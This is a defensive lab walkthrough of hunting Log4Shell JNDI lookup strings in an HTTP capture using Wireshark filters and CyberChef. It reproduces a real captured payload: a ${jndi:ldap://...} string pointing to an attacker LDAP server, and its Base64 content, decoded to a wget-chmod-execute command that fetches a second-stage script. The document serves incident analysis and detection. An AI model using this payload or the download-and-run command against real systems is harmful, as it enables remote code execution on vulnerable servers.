LOG4J ANALYSIS — hunting Log4Shell (CVE-2021-44228) JNDI lookup strings in captured HTTP traffic

root@dco:~$ wireshark &

 * The capture is already on disk, so no capture privilege (root, or dumpcap capabilities) is needed to open it. Prefer running Wireshark as an unprivileged user: its dissectors parse attacker-controlled bytes, and the pcap in this exercise is, by design, hostile input.

Wireshark > File > Open > Desktop/exercise-pcaps/http/http.pcapng

#step 1: get an overview — find HTTP requests that carry a JNDI lookup string
Wireshark
 Filter: http.request.method == "POST" && http.user_agent contains "jndi"
 * `contains` takes a quoted string; a bare `$` does not parse. Restricting to POST + User-Agent is tuned to this exercise: the lookup can sit in any field the target logs (URI, X-Forwarded-For, Authorization, body, …) and in GETs just as well, so a broader first sweep is `http contains "jndi"` or `http contains "${"`. Nested-lookup obfuscation such as `${${lower:j}ndi:...}` defeats a literal "jndi" match, so widen the filter if a first pass comes up empty.
 
 * 444	3163.829852	45.137.21.9	198.71.247.91	HTTP	447	${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}	POST / HTTP/1.1 
 * Reading the hit: the requesting host 45.137.21.9 is also the LDAP callback server named inside the lookup (45.137.21.9:1389); the target is 198.71.247.91. A request containing the string shows an attempt, not a success — confirm exploitation by looking for an outbound connection from 198.71.247.91 to 45.137.21.9 on tcp/1389 (e.g. `ip.addr == 45.137.21.9 && tcp.port == 1389`) and the follow-on fetch of the second stage.
 
WireShark > Packet List > Packet Details > right-click user-agent > Copy > Value
 ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}
 
CyberChef (cyberchef.io is a web page, not a shell command; it also runs fully offline, and `base64 -d` on the workstation does the same without pasting attacker artifacts into a third-party site)
 input: d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==
 recipe: From Base64
 recipe: Defang IP Addresses
 output: wget http://62[.]210[.]130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
 * The decoded command downloads a second-stage script, marks it executable and runs it. Do not execute it; record 45.137.21.9 (attacker client + LDAP server, tcp/1389), 62.210.130.250 (second-stage host) and the filename lh.sh as indicators, and check the capture for any HTTP GET of /lh.sh from 198.71.247.91 to 62.210.130.250.
 
 * Be aware that capable adversaries can set the User-Agent to a legitimate browser string and place the lookup in another logged field, or obfuscate the lookup itself, so a User-Agent-only filter will miss them. The capture also only shows plaintext HTTP; with TLS in front of the application the payload is invisible on the wire, so pair this search with the application's own log lines and with egress hunting for unexpected LDAP/RMI/DNS callbacks from the server.
